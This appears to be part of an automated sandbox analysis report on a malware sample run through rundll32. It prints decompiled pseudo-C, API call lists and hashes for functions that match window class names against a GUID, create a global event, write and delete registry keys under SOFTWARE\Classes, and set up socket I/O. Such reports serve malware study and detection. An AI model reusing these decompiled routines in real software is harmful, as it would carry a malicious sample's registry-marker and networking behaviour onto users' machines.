                                                                                              C-Code - Quality: 91%
                                                                                              			E042651C0(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, void** _a8) {
                                                                                              				signed int _v8;
                                                                                              				char _v1032;
                                                                                              				char _v2056;
                                                                                              				struct HWND__* _v2060;
                                                                                              				void** _v2064;
                                                                                              				signed int _t20;
                                                                                              				void** _t22;
                                                                                              				signed int _t33;
                                                                                              				signed int _t34;
                                                                                              				int _t44;
                                                                                              				void* _t50;
                                                                                              				char* _t53;
                                                                                              				void* _t56;
                                                                                              				intOrPtr _t57;
                                                                                              				void* _t58;
                                                                                              				void* _t59;
                                                                                              				CHAR* _t61;
                                                                                              				struct HWND__* _t63;
                                                                                              				int _t64;
                                                                                              				DWORD* _t65;
                                                                                              				signed int _t66;
                                                                                              
                                                                                              				_t58 = __edi;
                                                                                              				_t20 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t20 ^ _t66;
                                                                                              				_t22 = _a8;
                                                                                              				_t63 = _a4;
                                                                                              				_t50 =  *_t22;
                                                                                              				_v2064 = _t22;
                                                                                              				_v2060 = _t63;
                                                                                              				E0427DEA0(__edi,  &_v2056, 0, 0x400);
                                                                                              				E0427DEA0(_t58,  &_v1032, 0, 0x400);
                                                                                              				GetClassNameA(_t63,  &_v1032, 0x3ff);
                                                                                              				if(lstrlenA( &_v1032) == 0) {
                                                                                              					L14:
                                                                                              					return E04275AFE(_v8 ^ _t66);
                                                                                              				}
                                                                                              				_t53 = "5B3838F5-0C81-46D9-A4C0-6EA28CA3E942";
                                                                                              				_t33 =  &_v1032;
                                                                                              				while(1) {
                                                                                              					_t56 =  *_t33;
                                                                                              					if(_t56 !=  *_t53) {
                                                                                              						break;
                                                                                              					}
                                                                                              					if(_t56 == 0) {
                                                                                              						L6:
                                                                                              						_t34 = 0;
                                                                                              						L8:
                                                                                              						if(_t34 == 0) {
                                                                                              							_push(_t58);
                                                                                              							GetWindowTextA(_t63,  &_v2056, 0x3ff);
                                                                                              							_t59 = E0427DA60( &_v2056, 0x5f);
                                                                                              							if(_t59 != 0) {
                                                                                              								_t61 = _t59 + 1;
                                                                                              								if(_t50 == 0) {
                                                                                              									_t50 = LocalAlloc(0x40, 1);
                                                                                              								}
                                                                                              								_t64 = LocalSize(_t50);
                                                                                              								_t15 = lstrlenA(_t61) + 5; // 0x5
                                                                                              								_t50 = LocalReAlloc(_t50, _t15 + _t64, 0x42);
                                                                                              								_t65 = _t64 + _t50;
                                                                                              								GetWindowThreadProcessId(_v2060, _t65);
                                                                                              								_t44 = lstrlenA(_t61);
                                                                                              								_t17 =  &(_t65[1]); // 0x4
                                                                                              								E0427E060(_t17, _t61, _t44 + 1);
                                                                                              							}
                                                                                              							 *_v2064 = _t50;
                                                                                              						}
                                                                                              						goto L14;
                                                                                              					}
                                                                                              					_t57 =  *((intOrPtr*)(_t33 + 1));
                                                                                              					if(_t57 != _t53[1]) {
                                                                                              						break;
                                                                                              					}
                                                                                              					_t33 = _t33 + 2;
                                                                                              					_t53 =  &(_t53[2]);
                                                                                              					if(_t57 != 0) {
                                                                                              						continue;
                                                                                              					}
                                                                                              					goto L6;
                                                                                              				}
                                                                                              				asm("sbb eax, eax");
                                                                                              				_t34 = _t33 | 0x00000001;
                                                                                              				goto L8;
                                                                                              			}
























                                                                                              0x042651c0
                                                                                              0x042651c9
                                                                                              0x042651d0
                                                                                              0x042651d3
                                                                                              0x042651d8
                                                                                              0x042651db
                                                                                              0x042651e2
                                                                                              0x042651f1
                                                                                              0x042651f7
                                                                                              0x0426520a
                                                                                              0x0426521f
                                                                                              0x04265234
                                                                                              0x042652fd
                                                                                              0x0426530e
                                                                                              0x0426530e
                                                                                              0x0426523a
                                                                                              0x0426523f
                                                                                              0x04265245
                                                                                              0x04265245
                                                                                              0x04265249
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426524d
                                                                                              0x04265261
                                                                                              0x04265261
                                                                                              0x0426526a
                                                                                              0x0426526c
                                                                                              0x04265272
                                                                                              0x04265280
                                                                                              0x04265294
                                                                                              0x0426529b
                                                                                              0x0426529d
                                                                                              0x042652a0
                                                                                              0x042652ac
                                                                                              0x042652ac
                                                                                              0x042652b6
                                                                                              0x042652c0
                                                                                              0x042652cd
                                                                                              0x042652cf
                                                                                              0x042652d8
                                                                                              0x042652df
                                                                                              0x042652e7
                                                                                              0x042652ec
                                                                                              0x042652f1
                                                                                              0x042652fb
                                                                                              0x042652fb
                                                                                              0x00000000
                                                                                              0x0426526c
                                                                                              0x0426524f
                                                                                              0x04265255
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04265257
                                                                                              0x0426525a
                                                                                              0x0426525f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426525f
                                                                                              0x04265265
                                                                                              0x04265267
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetClassNameA.USER32(?,?,000003FF), ref: 0426521F
                                                                                              • lstrlen.KERNEL32(?), ref: 0426522C
                                                                                              • GetWindowTextA.USER32(?,?,000003FF), ref: 04265280
                                                                                              • _strrchr.LIBCMT ref: 0426528F
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 042652A6
                                                                                              • LocalSize.KERNEL32 ref: 042652AF
                                                                                              • lstrlen.KERNEL32(00000001), ref: 042652B8
                                                                                              • LocalReAlloc.KERNEL32(?,00000005,00000042), ref: 042652C7
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 042652D8
                                                                                              • lstrlen.KERNEL32(00000001,?,00000005,00000042), ref: 042652DF
                                                                                              Strings
                                                                                              • 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942, xrefs: 0426523A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Locallstrlen$AllocWindow$ClassNameProcessSizeTextThread_strrchr
                                                                                              • String ID: 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
                                                                                              • API String ID: 414574500-3141347713
                                                                                              • Opcode ID: 0c3881dd7b2464ca41c682d904ee25931ebdb9b56d9628526feaf276e6cac63c
                                                                                              • Instruction ID: e07c027457c2c06399b2914a852fef319aecdcee630a7d2e7a46e67659141792
                                                                                              • Opcode Fuzzy Hash: 0c3881dd7b2464ca41c682d904ee25931ebdb9b56d9628526feaf276e6cac63c
                                                                                              • Instruction Fuzzy Hash: 8E311AB1B10209ABD720AF74EC88FA677BCEF44700F0400A5EB46D7141EF35AE868B54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E04269390(void* __ebx, struct _SECURITY_ATTRIBUTES** __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				void* _v612;
                                                                                              				char _v616;
                                                                                              				signed int _t23;
                                                                                              				void* _t30;
                                                                                              				int* _t65;
                                                                                              				signed int _t66;
                                                                                              
                                                                                              				_t23 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t23 ^ _t66;
                                                                                              				_t65 = __ecx;
                                                                                              				_push(__edi);
                                                                                              				 *__ecx = 0;
                                                                                              				E04266050(__ebx, _a4,  &_v88, __edi, __ecx);
                                                                                              				wsprintfW( &_v608, L"Global\\%s",  &_v88);
                                                                                              				_t30 = CreateEventW(0, 1, 0,  &_v608);
                                                                                              				_t65[2] = _t30;
                                                                                              				if(_t30 == 0) {
                                                                                              					L5:
                                                                                              					 *_t65 = 1;
                                                                                              					goto L6;
                                                                                              				} else {
                                                                                              					if(GetLastError() != 0xb7) {
                                                                                              						_v616 = GetCurrentThreadId() + 0x13c;
                                                                                              						wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              						_v612 = 0;
                                                                                              						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0) != 0) {
                                                                                              							goto L5;
                                                                                              						} else {
                                                                                              							RegSetValueExW(_v612, "1", 0, 4,  &_v616, 4);
                                                                                              							_t62 =  ==  ? 1 : 0;
                                                                                              							RegCloseKey(_v612);
                                                                                              							__eflags =  ==  ? 1 : 0;
                                                                                              							if(( ==  ? 1 : 0) == 0) {
                                                                                              								goto L5;
                                                                                              							}
                                                                                              						}
                                                                                              						L6:
                                                                                              						return E04275AFE(_v8 ^ _t66);
                                                                                              					} else {
                                                                                              						CloseHandle(_t65[2]);
                                                                                              						_t65[1] = 1;
                                                                                              						return E04275AFE(_v8 ^ _t66);
                                                                                              					}
                                                                                              				}
                                                                                              			}












                                                                                              0x04269399
                                                                                              0x042693a0
                                                                                              0x042693a4
                                                                                              0x042693ac
                                                                                              0x042693ad
                                                                                              0x042693b3
                                                                                              0x042693ce
                                                                                              0x042693e0
                                                                                              0x042693e6
                                                                                              0x042693eb
                                                                                              0x042694ae
                                                                                              0x042694ae
                                                                                              0x00000000
                                                                                              0x042693f1
                                                                                              0x042693fc
                                                                                              0x0426942d
                                                                                              0x04269443
                                                                                              0x04269450
                                                                                              0x04269475
                                                                                              0x00000000
                                                                                              0x04269477
                                                                                              0x0426948e
                                                                                              0x042694a1
                                                                                              0x042694a4
                                                                                              0x042694aa
                                                                                              0x042694ac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042694ac
                                                                                              0x042694b4
                                                                                              0x042694ca
                                                                                              0x042693fe
                                                                                              0x04269401
                                                                                              0x04269408
                                                                                              0x0426941f
                                                                                              0x0426941f
                                                                                              0x042693fc

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 042693CE
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 042693E0
                                                                                              • GetLastError.KERNEL32 ref: 042693F1
                                                                                              • CloseHandle.KERNEL32(?), ref: 04269401
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 04269422
                                                                                              • wsprintfW.USER32 ref: 04269443
                                                                                              • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 0426946D
                                                                                              • RegSetValueExW.ADVAPI32(?,0429E09C,00000000,00000004,?,00000004), ref: 0426948E
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 042694A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close$CreateValuewsprintf$CurrentErrorEventHandleLastOpenQueryThread
                                                                                              • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 709688788-2346361075
                                                                                              • Opcode ID: 832f468f179acd5152904b564f5b3bc7d68f688016e57b8522b17a1445bb2b68
                                                                                              • Instruction ID: 33cff2804ee12c433cfc3a65d82a959fddb07a1228c70f3cc45879d8fa000fc4
                                                                                              • Opcode Fuzzy Hash: 832f468f179acd5152904b564f5b3bc7d68f688016e57b8522b17a1445bb2b68
                                                                                              • Instruction Fuzzy Hash: 19316371714209AFDB20EFA4EC49FABB7B8EF84700F11406AE90AD6140EB75AD84CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E04256400(void* __ebx, void* __ecx) {
                                                                                              				void* _v8;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t17;
                                                                                              				void* _t20;
                                                                                              				intOrPtr _t21;
                                                                                              				intOrPtr _t27;
                                                                                              				void* _t37;
                                                                                              				void* _t40;
                                                                                              
                                                                                              				_t45 =  *0x42a78d0;
                                                                                              				_t40 = __ecx;
                                                                                              				if( *0x42a78d0 == 0) {
                                                                                              					 *0x42a78d0 = E042562B0(__ebx, E04275B14(__ecx, _t45, 0x3c), _t37);
                                                                                              				}
                                                                                              				_v8 = 0;
                                                                                              				if(_t40 == 0) {
                                                                                              					RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0, 0, 0x104, 0,  &_v8, 0);
                                                                                              					_t17 = _v8;
                                                                                              					__eflags = _t17;
                                                                                              					if(_t17 != 0) {
                                                                                              						RegCloseKey(_t17);
                                                                                              					}
                                                                                              					_v8 = 0;
                                                                                              					RegCreateKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0, 0, 0x104, 0,  &_v8, 0);
                                                                                              					_t20 = _v8;
                                                                                              					__eflags = _t20;
                                                                                              					if(_t20 != 0) {
                                                                                              						RegCloseKey(_t20);
                                                                                              					}
                                                                                              					_t21 =  *0x42a78d0; // 0x0
                                                                                              					 *((intOrPtr*)(_t21 + 0x38)) = 1;
                                                                                              					return _t21;
                                                                                              				} else {
                                                                                              					if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0x20106,  &_v8) == 0) {
                                                                                              						SHDeleteKeyW(_v8, 0x429c5d0);
                                                                                              						RegCloseKey(_v8);
                                                                                              					}
                                                                                              					_v8 = 0;
                                                                                              					if(RegOpenKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0x20106,  &_v8) == 0) {
                                                                                              						SHDeleteKeyW(_v8, 0x429c5d0);
                                                                                              						RegCloseKey(_v8);
                                                                                              					}
                                                                                              					_t27 =  *0x42a78d0; // 0x0
                                                                                              					 *(_t27 + 0x38) = 0;
                                                                                              					return _t27;
                                                                                              				}
                                                                                              			}












                                                                                              0x04256406
                                                                                              0x0425640f
                                                                                              0x04256411
                                                                                              0x04256424
                                                                                              0x04256424
                                                                                              0x04256429
                                                                                              0x04256435
                                                                                              0x042564d5
                                                                                              0x042564d7
                                                                                              0x042564e0
                                                                                              0x042564e2
                                                                                              0x042564e5
                                                                                              0x042564e5
                                                                                              0x042564ec
                                                                                              0x0425650b
                                                                                              0x0425650d
                                                                                              0x04256510
                                                                                              0x04256512
                                                                                              0x04256515
                                                                                              0x04256515
                                                                                              0x04256517
                                                                                              0x0425651e
                                                                                              0x04256528
                                                                                              0x04256437
                                                                                              0x0425645d
                                                                                              0x04256467
                                                                                              0x0425646c
                                                                                              0x0425646c
                                                                                              0x04256471
                                                                                              0x04256492
                                                                                              0x0425649c
                                                                                              0x042564a1
                                                                                              0x042564a1
                                                                                              0x042564a3
                                                                                              0x042564a8
                                                                                              0x042564b4
                                                                                              0x042564b4

                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020106,00000000), ref: 04256449
                                                                                              • SHDeleteKeyW.SHLWAPI(00000000,0429C5D0), ref: 04256467
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0425646C
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00020106,00000000), ref: 0425648A
                                                                                              • SHDeleteKeyW.SHLWAPI(00000000,0429C5D0), ref: 0425649C
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 042564A1
                                                                                                • Part of subcall function 042562B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,0426B6FC,?,042A6318,?,?,0426B6FC), ref: 04256360
                                                                                                • Part of subcall function 042562B0: RegCloseKey.ADVAPI32(0426B6FC,?,042A6318,?,?,0426B6FC), ref: 0425636D
                                                                                              • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 042564D5
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 042564E5
                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 0425650B
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 04256515
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close$Open$CreateDelete
                                                                                              • String ID: SOFTWARE\Classes\.codein
                                                                                              • API String ID: 185900105-3041101089
                                                                                              • Opcode ID: 6fbd91e5e5a1bc9a9dad5f3adcb282fe177045ee471e52edf90839a18983d54b
                                                                                              • Instruction ID: e40f8439dc5abf61674ca9d4e33e4cd66758b34a5bd1e2dc310d28c394f9d5b8
                                                                                              • Opcode Fuzzy Hash: 6fbd91e5e5a1bc9a9dad5f3adcb282fe177045ee471e52edf90839a18983d54b
                                                                                              • Instruction Fuzzy Hash: 66315270B50314FBEB20EAA5ED0AF5977E8EB44B10F600055FE04B7291DBB4BE10DA59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 34%
                                                                                              			E04274090(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4, char _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                                              				signed int _v8;
                                                                                              				char _v12;
                                                                                              				char _v16;
                                                                                              				void* _v20;
                                                                                              				intOrPtr* _v24;
                                                                                              				intOrPtr* _v28;
                                                                                              				signed int _v44;
                                                                                              				char _v48;
                                                                                              				intOrPtr _v52;
                                                                                              				intOrPtr _v56;
                                                                                              				signed int _v68;
                                                                                              				intOrPtr _v72;
                                                                                              				char _v76;
                                                                                              				signed int _t73;
                                                                                              				void* _t79;
                                                                                              				long _t85;
                                                                                              				long _t89;
                                                                                              				long _t92;
                                                                                              				signed int _t94;
                                                                                              				signed int _t103;
                                                                                              				void* _t104;
                                                                                              				signed int _t105;
                                                                                              				long _t106;
                                                                                              				void* _t115;
                                                                                              				intOrPtr* _t120;
                                                                                              				intOrPtr _t121;
                                                                                              				signed int _t135;
                                                                                              				intOrPtr* _t139;
                                                                                              				long _t140;
                                                                                              				struct _CRITICAL_SECTION* _t144;
                                                                                              				intOrPtr _t146;
                                                                                              				intOrPtr _t148;
                                                                                              				signed int _t149;
                                                                                              				signed int _t150;
                                                                                              				signed int _t151;
                                                                                              
                                                                                              				_t73 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t73 ^ _t149;
                                                                                              				_push(__ebx);
                                                                                              				_push(__esi);
                                                                                              				_v12 = _a4;
                                                                                              				_push(__edi);
                                                                                              				_t139 = __ecx;
                                                                                              				_v16 = _a12;
                                                                                              				_v28 = _a16;
                                                                                              				_v24 = __ecx;
                                                                                              				_v20 = 0;
                                                                                              				_t79 = E0426C880(__ecx + 0xb0,  &_v20);
                                                                                              				_t155 = _t79;
                                                                                              				if(_t79 != 0) {
                                                                                              					_t115 = _v20;
                                                                                              				} else {
                                                                                              					_t148 =  *((intOrPtr*)(__ecx + 0xa4));
                                                                                              					_t115 = RtlAllocateHeap( *(__ecx + 0x94), 0, _t148 + 0x38);
                                                                                              					_v20 = _t115;
                                                                                              					_t17 = _t115 + 0x38; // 0x38
                                                                                              					 *(_t115 + 0x14) = _t139 + 0x94;
                                                                                              					 *((intOrPtr*)(_t115 + 0x24)) = _t148;
                                                                                              					 *((intOrPtr*)(_t115 + 0x20)) = _t17;
                                                                                              				}
                                                                                              				_push(_v16);
                                                                                              				asm("xorps xmm0, xmm0");
                                                                                              				_push(_v12);
                                                                                              				asm("movups [ebx], xmm0");
                                                                                              				 *(_t115 + 0x10) = 0;
                                                                                              				 *(_t115 + 0x1c) = 0;
                                                                                              				 *(_t115 + 0x1c) =  *(_t139 + 0x18);
                                                                                              				_t140 = E042727F0(_t139, _t155);
                                                                                              				_t28 = _t140 + 0x54; // 0x54
                                                                                              				_t144 = _t28;
                                                                                              				EnterCriticalSection(_t144);
                                                                                              				_push(_a20);
                                                                                              				_t120 = _v24;
                                                                                              				E04272A10(_t120, _t144, _v12, _t140, _v28, _t139);
                                                                                              				if( *((intOrPtr*)(_v24 + 0x4c)) == 0) {
                                                                                              					_t120 = _v28;
                                                                                              					__eflags =  *_t120 - 2;
                                                                                              					_t85 =  !=  ? 0x1c : 0x10;
                                                                                              					__imp__#4( *(_t140 + 0x88), _t120, 0x10);
                                                                                              					__eflags = 0x10 - 0xffffffff;
                                                                                              					if(0x10 == 0xffffffff) {
                                                                                              						__imp__#111();
                                                                                              						goto L15;
                                                                                              					} else {
                                                                                              						_t92 =  &_v12;
                                                                                              						_v12 = 1;
                                                                                              						__imp__#10( *(_t140 + 0x88), 0x8004667e, _t92);
                                                                                              						__eflags = _t92;
                                                                                              						if(_t92 != 0) {
                                                                                              							goto L22;
                                                                                              						} else {
                                                                                              							_t103 = CreateIoCompletionPort( *(_t140 + 0x88),  *(_v24 + 0x50), _t140, _t92);
                                                                                              							__eflags = _t103;
                                                                                              							if(_t103 == 0) {
                                                                                              								goto L7;
                                                                                              							} else {
                                                                                              								 *((intOrPtr*)(_t140 + 0x48)) = 1;
                                                                                              								_t104 = E042720F0(_v24, _t140);
                                                                                              								__eflags = _t104 - 2;
                                                                                              								if(_t104 == 2) {
                                                                                              									_t105 = GetLastError();
                                                                                              									__eflags = _t105;
                                                                                              									_t85 =  ==  ? 0x4c7 : _t105;
                                                                                              									goto L15;
                                                                                              								} else {
                                                                                              									_t85 = E04273AC0(_t115, _v24, _t140, _t144, _t140, _t115);
                                                                                              									_t121 = 0;
                                                                                              								}
                                                                                              							}
                                                                                              							goto L16;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t106 =  &_v16;
                                                                                              					_v16 = 1;
                                                                                              					__imp__#10( *(_t140 + 0x88), 0x8004667e, _t106);
                                                                                              					if(_t106 != 0) {
                                                                                              						_push(0x80004005);
                                                                                              						E04257AC0();
                                                                                              						L22:
                                                                                              						E04257AC0();
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						_t150 = _t151;
                                                                                              						_t94 =  *0x42a4008; // 0xd33db39d
                                                                                              						_v68 = _t94 ^ _t150;
                                                                                              						_t135 = _v44;
                                                                                              						__eflags = _t135;
                                                                                              						_t146 = _v52;
                                                                                              						_v76 = _v48;
                                                                                              						_t98 =  ==  ? _t146 : _t146 + _t135;
                                                                                              						_v72 =  ==  ? _t146 : _t146 + _t135;
                                                                                              						 *((intOrPtr*)( *_t120 + 8))( &_v76, 1, _t144, _t149, 0x80004005);
                                                                                              						__eflags = _v68 ^ _t150;
                                                                                              						return E04275AFE(_v68 ^ _t150, _v56);
                                                                                              					} else {
                                                                                              						if(CreateIoCompletionPort( *(_t140 + 0x88),  *(_v24 + 0x50), _t140, _t106) == 0) {
                                                                                              							L7:
                                                                                              							_t85 = GetLastError();
                                                                                              						} else {
                                                                                              							_t85 = E0426D560( *((intOrPtr*)(_v24 + 0x40)),  *(_t140 + 0x88), _v28, _t115);
                                                                                              						}
                                                                                              						L15:
                                                                                              						_t121 = 1;
                                                                                              						L16:
                                                                                              						_v20 = _t85;
                                                                                              						if(_t85 != 0 && _t121 != 0) {
                                                                                              							E04272920(_v24, _t140, 0, 0, 0);
                                                                                              							_t89 = E0426C930(_v24 + 0xb0, _t115);
                                                                                              							if(_t89 == 0) {
                                                                                              								HeapFree( *( *(_t115 + 0x14)), _t89, _t115);
                                                                                              							}
                                                                                              						}
                                                                                              						LeaveCriticalSection(_t144);
                                                                                              						return E04275AFE(_v8 ^ _t149);
                                                                                              					}
                                                                                              				}
                                                                                              			}






































                                                                                              0x04274096
                                                                                              0x0427409d
                                                                                              0x042740a3
                                                                                              0x042740a4
                                                                                              0x042740a5
                                                                                              0x042740ab
                                                                                              0x042740ac
                                                                                              0x042740ae
                                                                                              0x042740b4
                                                                                              0x042740c1
                                                                                              0x042740c4
                                                                                              0x042740cb
                                                                                              0x042740d0
                                                                                              0x042740d2
                                                                                              0x04274105
                                                                                              0x042740d4
                                                                                              0x042740d4
                                                                                              0x042740ec
                                                                                              0x042740f4
                                                                                              0x042740f7
                                                                                              0x042740fa
                                                                                              0x042740fd
                                                                                              0x04274100
                                                                                              0x04274100
                                                                                              0x04274108
                                                                                              0x0427410b
                                                                                              0x04274110
                                                                                              0x04274113
                                                                                              0x04274116
                                                                                              0x0427411d
                                                                                              0x04274127
                                                                                              0x0427412f
                                                                                              0x04274131
                                                                                              0x04274131
                                                                                              0x04274135
                                                                                              0x0427413b
                                                                                              0x04274142
                                                                                              0x04274149
                                                                                              0x04274155
                                                                                              0x042741bb
                                                                                              0x042741c8
                                                                                              0x042741cc
                                                                                              0x042741d7
                                                                                              0x042741dd
                                                                                              0x042741e0
                                                                                              0x04274253
                                                                                              0x00000000
                                                                                              0x042741e2
                                                                                              0x042741e2
                                                                                              0x042741e5
                                                                                              0x042741f8
                                                                                              0x042741fe
                                                                                              0x04274200
                                                                                              0x00000000
                                                                                              0x04274206
                                                                                              0x04274214
                                                                                              0x0427421a
                                                                                              0x0427421c
                                                                                              0x00000000
                                                                                              0x0427421e
                                                                                              0x04274222
                                                                                              0x04274229
                                                                                              0x0427422e
                                                                                              0x04274231
                                                                                              0x04274241
                                                                                              0x04274247
                                                                                              0x0427424e
                                                                                              0x00000000
                                                                                              0x04274233
                                                                                              0x04274238
                                                                                              0x0427423d
                                                                                              0x0427423d
                                                                                              0x04274231
                                                                                              0x00000000
                                                                                              0x0427421c
                                                                                              0x04274200
                                                                                              0x04274157
                                                                                              0x04274157
                                                                                              0x0427415a
                                                                                              0x0427416d
                                                                                              0x04274175
                                                                                              0x042742b4
                                                                                              0x042742b9
                                                                                              0x042742be
                                                                                              0x042742c3
                                                                                              0x042742c8
                                                                                              0x042742c9
                                                                                              0x042742ca
                                                                                              0x042742cb
                                                                                              0x042742cc
                                                                                              0x042742cd
                                                                                              0x042742ce
                                                                                              0x042742cf
                                                                                              0x042742d1
                                                                                              0x042742d6
                                                                                              0x042742dd
                                                                                              0x042742e0
                                                                                              0x042742e3
                                                                                              0x042742e9
                                                                                              0x042742ec
                                                                                              0x042742f4
                                                                                              0x042742fa
                                                                                              0x04274303
                                                                                              0x04274309
                                                                                              0x04274314
                                                                                              0x0427417b
                                                                                              0x04274191
                                                                                              0x042741b0
                                                                                              0x042741b0
                                                                                              0x04274193
                                                                                              0x042741a3
                                                                                              0x042741a8
                                                                                              0x04274259
                                                                                              0x04274259
                                                                                              0x0427425e
                                                                                              0x0427425e
                                                                                              0x04274263
                                                                                              0x04274275
                                                                                              0x04274281
                                                                                              0x04274288
                                                                                              0x04274291
                                                                                              0x04274291
                                                                                              0x04274288
                                                                                              0x04274298
                                                                                              0x042742b1
                                                                                              0x042742b1
                                                                                              0x04274175

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 042740E6
                                                                                              • RtlEnterCriticalSection.NTDLL(00000054), ref: 04274135
                                                                                              • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 0427416D
                                                                                              • CreateIoCompletionPort.KERNEL32(?,?,00000000,00000000), ref: 04274189
                                                                                              • GetLastError.KERNEL32 ref: 042741B0
                                                                                                • Part of subcall function 04257AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 04257ADE
                                                                                                • Part of subcall function 04257AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0426FA53
                                                                                                • Part of subcall function 04257AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0426FA7B
                                                                                                • Part of subcall function 04257AC0: SetLastError.KERNEL32(0000139F,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 0426FA87
                                                                                              • HeapFree.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04274291
                                                                                              • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04274298
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterErrorHeapLastLeave$AllocateCompletionCreateExceptionFreePortRaiseioctlsocket
                                                                                              • String ID:
                                                                                              • API String ID: 421389320-0
